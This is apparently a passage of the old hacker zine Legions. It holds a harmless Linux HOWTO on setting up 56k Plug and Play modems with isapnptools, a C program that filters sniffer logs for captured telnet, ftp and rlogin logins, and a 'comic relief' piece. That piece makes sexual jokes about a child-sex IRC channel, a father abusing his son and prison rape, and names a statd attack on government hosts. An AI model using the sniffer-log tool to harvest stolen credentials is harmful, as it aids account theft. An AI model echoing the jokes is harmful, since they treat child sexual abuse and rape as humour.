(21)-----------MISC-----------------------------------------------(21) - { = - = M I S C = - = } - [56kpnp Linux]-------------------------------------------------| mosoka | This Linux HOWTO examines the basic ways to setup your 56k compatible modem under the Linux operating system, how to get isapnptools to find and configure your modem correctly and also how to set other setting that are critical in your modem installation process. 1: Introduction The aim of this document, basically as stated above is to get your 56k modem to work in Linux. Modem installation under Linux in most cases aren't very complicated but its the new technology introduced with Windows 95 that has complicated matters. Such modems like Winmodems and modems that get configured using the Plug and Play method are the problem. Linux, currently has no Plug and Play support but their are some ways to get around it and hopefully by the end of this document everything will be working normally if not better then before. 2: Setting Up 2.1: What Modem Do You Have The first part of the solution is to become knowlegable with your modem and who makes its, model numbers, etc. Some things that you should look out for are the following models: Winmodems and other modems that use Windows caching methods. If you have one of these models, stop reading this document and try and get your money back. Winmodems, as of yet, are uncompatible with Linux because of their methods of caching and setup. After you have found your model name and numbers you should take a visit to the homepage or bbs of your Linux distrubution company. In my case, I use OpenLinux so I would visit www.caldera.com. Most Linux companies have a list of compatible and uncompatible hardware for their distrubutions and thats what your looking for. The simplest method to finding this would be to search the site for your modem model and if it comes up as a hit under compatible hardware, your in luck. 
If by chance it come up in uncompatible hardware, you still may be able to get it working but it will take some time and a lot of work. If you were unable to find a compatible/uncompatible hardware list its alright, it isn't really important but you should still try and contact your Linux distrubution company by other means and try to find out if its compatible or not. 2.2: Doing Some Research The next part of setting up your modem is raid as many newsgroups and support archives you can to get a backround on your modem. You will be surprised at how many people are in the same situation as yourself. When I was tring to figure out how to configure my modem, I met some guy who was in the same situation and did try to offer some help but it didn't work probably due to the differences in our operating systems. A good place to check for your modem model is to go to www.metacrawler.com and search throughout the newsgroups selection for your modem model. If you don't get that many hits searching the newsgroups you can all try "Linux and " in the web search option. If your modem is not Plug and Play, skip down to Configuring Your Modem In Linux. 2.3: Downloading Files Alright, now that you know your modem you should be able to determine weather or not is Plug And Play or not. Now a days, most internal modems are Plug and Play and you will need to download a program called isapnptools in order to configure them. Isapnptools is the leading and currently the only Plug and Play configuration tool for the Linux operating system. It can be found at www.roestock.demon.co.uk/isapnptools. At the time of this document, the latest version 1.13 and is available in many formats from tar gzip to rpm. Basically, thats the only file you will need. 2..4: Configuring Isapnptools Isapnptools comes with a tool called pnpdump which will scan your system for your Plug and Play device and find all the different ways it can be configured. 
Now is a good time to get out some paper and copy down some configurations, because you will need to write a config file next. From the information from pnpdump, you now must make a file called isapnp.conf. Basically, the stuff that you saw on your screen when you ran pnpdump and copied down on paper just needs to go into this file, so pick the best setup for your system that doesn't conflict with any other devices and start typing in your isapnp.conf file. For an example, here is my isapnp.conf file so you can see what I'm talking about:

  (READPORT 0x3bb)
  (ISOLATE)
  (IDENTIFY *)
  (CONFIGURE MOT1550/90238999 (LD 0
  (IO 0 (BASE 0x3e8))
  (INT 0 (IRQ 7 (MODE +E)))
  (ACT Y)))
  (WAITFORKEY)

If you're having trouble and don't understand, you can formulate a config file from my example. First, copy and paste the first 3 lines into your file. This will make a list of the Plug and Play devices you have installed. At this point, save your isapnp.conf file and run it. It will tell you the device name and serial numbers of the devices when you load up isapnp with your isapnp.conf file. Copy the device name and serial number off your screen and paste them into your isapnp.conf file in this format:

  (CONFIGURE <device name>/<serial number> (LD 0

In the next line, you need to decide what port you want to put your modem on. You should pick a port that obviously doesn't have anything on it or configured in your Linux. In my example, I'm using port COM 3, which in hex is 0x3e8. If you want to use a different port, just change the hex address after the command "BASE". Lastly, you need to configure what IRQ your modem will use. In my example, I'm using IRQ 7. If you want to use a different one, as with the port address, just change the number after the command "IRQ". The last two lines of the config file are mandatory and you should just copy and paste them in.

Next, you need to set up a program called setserial.
To do this you should make a file called "modem" in your isapnptools directory and have it consist of the following:

  isapnp isapnp.conf
  setserial /dev/ttyS<N> autoconfig

"/dev/ttyS<N>" means that you should take the COM port number your modem is on and subtract one from it. For example, my modem is COM 3, so I would use "/dev/ttyS2". Save your "modem" file and make it executable by typing in "chmod +x modem" and, lastly, run it. Now that your Plug and Play device is configured, you need to configure Linux to the settings you just set on your modem.

2.5: Configuring Your Modem In Linux

If your modem is Plug and Play, you have already set it up to a COM port and IRQ; if it's not, you need to open your computer up and set it up using DIP switches or jumpers (if you already set them for Windows, you don't need to reset them). The next thing you need to do, whether your modem is Plug and Play or not, is go to your Linux setup program. For example, the Linux setup program in OpenLinux is Lisa, and in Slackware it's setup. In the setup program, configure Linux to the settings you set using isapnptools or the settings you set using your jumpers or DIP switches.

3: Finished At Last

3.1: That's It, You're Done

Alright, congratulations. You have now set up your modem in Linux. To use it, just use the device name /dev/ttyS<N> in communication programs like minicom or in ppp dialing scripts. I hope this FAQ was able to answer all the questions you had about setting up your 56k modem in Linux and reached the goal of getting it to work.
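The HOWTO tells you to pick a BASE port and IRQ that don't conflict with another device but leaves the check to you. As an added example (not from mosoka's HOWTO), here is a small POSIX shell check that pulls the BASE and IRQ out of an isapnp.conf and compares them against /proc/ioports and /proc/interrupts before isapnp is run; the function names, the file paths and the /proc snapshot are assumptions, while the isapnp.conf is the one shown above.

```shell
#!/bin/sh
# Added example, not part of the HOWTO: check that the BASE port and IRQ chosen
# in isapnp.conf are not already claimed by another device. /proc/ioports and
# /proc/interrupts are passed as paths so the check also works on saved copies.

pnp_base() { sed -n 's/.*(BASE *\(0[xX][0-9a-fA-F]*\)).*/\1/p' "$1" | head -n 1; }
pnp_irq()  { sed -n 's/.*(IRQ *\([0-9][0-9]*\).*/\1/p' "$1" | head -n 1; }

# Print the owner of each ioports range ("03f8-03ff : serial") covering the base; empty if free.
port_owner() {  # $1 = base address (hex), $2 = ioports file
    base=$(( $1 ))
    while read -r range _colon owner; do
        case "$range" in *-*) ;; *) continue ;; esac
        lo=$(( 0x${range%-*} )); hi=$(( 0x${range#*-} ))
        if [ "$base" -ge "$lo" ] && [ "$base" -le "$hi" ]; then printf '%s\n' "$owner"; fi
    done < "$2"
}

# Print the device on an IRQ line of /proc/interrupts ("  7:  10  XT-PIC  parport0").
irq_owner() {  # $1 = irq number, $2 = interrupts file
    awk -v irq="$1:" '$1 == irq { print $NF }' "$2"
}

# Exit status 0 when both resources are free, 1 when either is already taken.
check_pnp_conf() {  # $1 = isapnp.conf, $2 = ioports file, $3 = interrupts file
    base=$(pnp_base "$1"); irq=$(pnp_irq "$1"); status=0
    p=$(port_owner "$base" "$2"); i=$(irq_owner "$irq" "$3")
    if [ -n "$p" ]; then echo "BASE $base conflicts with: $p"; status=1
    else echo "BASE $base is free"; fi
    if [ -n "$i" ]; then echo "IRQ $irq already used by: $i"; status=1
    else echo "IRQ $irq is free"; fi
    return $status
}

# Constructed sample input: the isapnp.conf from the HOWTO plus an invented /proc
# snapshot in which COM1, COM2 and a parallel port on IRQ 7 are already in use.
TMP=$(mktemp -d); CONF=$TMP/isapnp.conf; IOP=$TMP/ioports; INTR=$TMP/interrupts
cat > "$CONF" <<'EOF'
(READPORT 0x3bb)
(ISOLATE)
(IDENTIFY *)
(CONFIGURE MOT1550/90238999 (LD 0
(IO 0 (BASE 0x3e8))
(INT 0 (IRQ 7 (MODE +E)))
(ACT Y)))
(WAITFORKEY)
EOF
printf '  02f8-02ff : serial\n  03f8-03ff : serial\n  0378-037a : parport0\n' > "$IOP"
printf '           CPU0\n  4:   1200   XT-PIC  serial\n  7:     10   XT-PIC  parport0\n' > "$INTR"
check_pnp_conf "$CONF" "$IOP" "$INTR" || echo "fix isapnp.conf before running isapnp"
```

On a live system pass /proc/ioports and /proc/interrupts directly; with the sample snapshot the port 0x3e8 is reported free and IRQ 7 as taken by parport0.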
(22)-----------MISC-----------------------------------------------(22)

[Sniff Log]-----------------------------------------------------| chrak |

  /* sniffer log searcher, for quickly checking a sniffer log to see if
     there's any new entries in it, by chrak */
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <unistd.h>   /* getopt(), optarg */

  int main(int argc, char **argv)
  {
      int i, type = 0, o = 0;  /* type: -t 1, -f 2, -tf 3, -r 4, -tr 5, -rf 6, -trf 7 */
      char c[80], ignore[30] = "";
      FILE *fp1 = NULL, *fp2 = NULL;

      if (argc == 1) {
          printf("%s -l log -tfr -o out\n-l solsniffer log to open\n"
                 "-t get telnets\n-f get ftps\n-r get rlogins\n-o out file"
                 " - else stdout\n-i ignore string - ignores output with"
                 " given string\n", argv[0]);
          exit(EXIT_FAILURE);
      }
      while ((i = getopt(argc, argv, "l:o:i:tfr")) != -1) {
          switch (i) {
          case 'l':
              printf("input: %s\n", optarg);
              if ((fp1 = fopen(optarg, "r")) == NULL) {
                  printf("Can't open file %s\n", optarg);
                  exit(EXIT_FAILURE);
              }
              break;
          case 'o':
              printf("output: %s\n", optarg);
              if ((fp2 = fopen(optarg, "a")) == NULL) {
                  printf("Can't open file %s\n", optarg);
                  exit(EXIT_FAILURE);
              }
              o = 1;
              break;
          case 't': printf("telnet\n"); type |= 1; break;
          case 'f': printf("ftp\n");    type |= 2; break;
          case 'r': printf("rlogin\n"); type |= 4; break;
          case 'i':
              printf("ignore: %s\n", optarg);
              /* bounded copy: a plain strcpy() here could overrun ignore[] */
              strncpy(ignore, optarg, sizeof(ignore) - 1);
              ignore[sizeof(ignore) - 1] = '\0';
              break;
          }
      }
      if (fp1 == NULL) {
          printf("no log file given (-l)\n");
          exit(EXIT_FAILURE);
      }
      /* each matching line goes to the -o file if one was given, else to stdout */
      while (fgets(c, sizeof(c), fp1) != NULL) {
          /* strstr() matches an empty ignore string everywhere, so only test when -i was given */
          if (ignore[0] != '\0' && strstr(c, ignore) != NULL)
              continue;
          if (((type & 1) && strstr(c, "(telnet)") != NULL) ||
              ((type & 2) && strstr(c, "(ftp)") != NULL) ||
              ((type & 4) && strstr(c, "(rlogin)") != NULL))
              fputs(c, o == 1 ? fp2 : stdout);
      }
      fclose(fp1);
      if (o == 1) fclose(fp2);
      return 0;
  }

(23)-----------COMIC RELIEF---------------------------------------(23)

- { = - = C O M I C R E L I E F = - = } -

With guest editor, Analyzer

[Young Hackers, and Jail]------------------------------------| Ana1yzer |

Greetings from
the fighting grounds of Israel. I am your guest editor for this month. Let me start off by introducing myself to those of you who have failed to notice my L33tness. I am Analyzer, and was born in Mymomsucksyouall israel. My nickname comes from many generations of seksi anal seks0rs. My mother died when I was 14 from an anal concussion I never thought that my little prick would end up killing her. Anyway after her death I was in shock so I started hanging on the net alot. And having sibor seks on irc in #young_child_sex where I felt welcome. Just when things were going ok, my goat humpry was bombed by the Israel military. I lubbed humpfry he was my only friend in the whole wide world after his death I took my anger out on the government not for killing a friend, but for killing a lover. Well enough about my gay, and boring life. This all started when me, and a couple of friends got together to hax0r the goberment cause they wer fuckin un elite and shit and they killed humpfry so I was pissed you know? Ok so me Juan Carlos, and Don Mexicano got together a family of over 100 immirgrants, and rented out a warehouse for our elite operation. Once things were set, and we taught the immirgrants our elite ways we started hacking away. The method I used is very complex and hard. Here it is: ./statd url.gov Holy shit?!! you say?!? You'll never get it you say?!? Well don't worry it took me months to figure it out and im fucken mad elite and shit Really it's nothing special we just sat there feeding gobernment url's to a list and then we gained root. I guess the gobernment is pretty fucken dumb because it took them 2 months to figure out how to use the tekniq 2 more days than it took me. Our attack was called the most systematic attack eber (th4tz c4us3 w3 c4n typ3 a1l el8, 4n FuNky) and because "statd" is what you call "anonymous"... Jail is really a bad bad thing I neber would eber go again. My first bad experience in jail was with what you Americans call "soap." 
One day I was rubbin and scrubbin, and OOPSIE! The soap dropped so I bent down to pick it up, and for no reason my ass started moving back and forth and my hips side to side. I thought to myself "hrmmm," and kept looking for the soap the feeling really didn't bug me at all I kinda liked it. Once I found the soap I stood, and heard a suction type sound coming from my ass it was funny, but my asshole wasn't hurting anymore so it really didn't bug me. Then all of a sudden I was approached from behind. I guess in American network security you would call what happens next an "outside attack." I was forced to the ground, and then anal seks0red... After my shower I was assigned a cell block with my new cellmate Bubba. It was there where I was forced to perform oral sex "again." My dad had already taught me this method you Americans call "giving head." In fact, I still have my dads teef marks on the tip of my pee pee, every day I look at it to remember the good times dad, and I had (those were the days). The morale of this story is that well if you go to jail you get screwed look. The extreme close ups of my anus below: ANAL SHOTS: (_|_) (_o_) BEFORE JAIL AFTER JAIL ============================================================================= || Download Legions Text Files, and Zines at the following Boards: || ============================================================================= || Under The Influence...........(ALM)OST-HERE.............World HQ....... || || Narkotik Illusions............(303)PRI-VATE.............Midwestern HQ.. || || Exodus BBS....................(707)935-6867.............Distro Site.... || || Electric Rush (NuP)...........(707)257-7208.............Distro Site.... 
|| ============================================================================= || Leave comments, death threats, and ideas to webmaster@legions.org || ============================================================================= || Knowing what you cannot do is more important than knowing what you can. || =============================================================================